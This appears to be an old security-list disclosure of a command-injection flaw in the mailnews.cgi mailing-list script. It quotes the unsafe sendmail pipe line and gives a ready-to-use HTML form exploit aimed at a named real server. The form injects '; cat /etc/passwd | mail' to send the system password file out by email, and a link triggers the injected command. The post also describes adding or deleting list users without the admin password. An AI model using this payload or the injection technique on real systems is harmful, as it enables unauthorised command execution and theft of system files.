Hello BuGReaders...
##Script: mailnews.cgi
##Introduction:
<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>
##Tested Version: 1.1, 1.3
Author dont parse some characters and he use very stupid "password
protection". We can add or delete users from maillist without known
admin password. But this is small problem ;] . Lets see what we can do
more.
<cat source>
open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>
where $mailprog [default] is sendmail and $member is users from usersfile.
Now we can do something like this. Add user "; cat /etc/passwd | mail
[EMAIL PROTECTED]' and use subroutine to execute this code :]
Simple exploit in html:
<HTML>
<BODY>
<FORM
ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ; [ex:" ; cat /etc/passwd |mail [EMAIL PROTECTED]"
without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT">
<INPUT TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>
Who : Kanedaaa
[EMAIL PROTECTED]
***$$$### " I moze bardzo wielu nie zrozumie tych slow...
Ale nie ma litosci dla SKURWYSYNOW .... " ###$$*
[EMAIL PROTECTED] Bohater ... Szef ... Abuser ... Cucumber Team Member... Bzz..
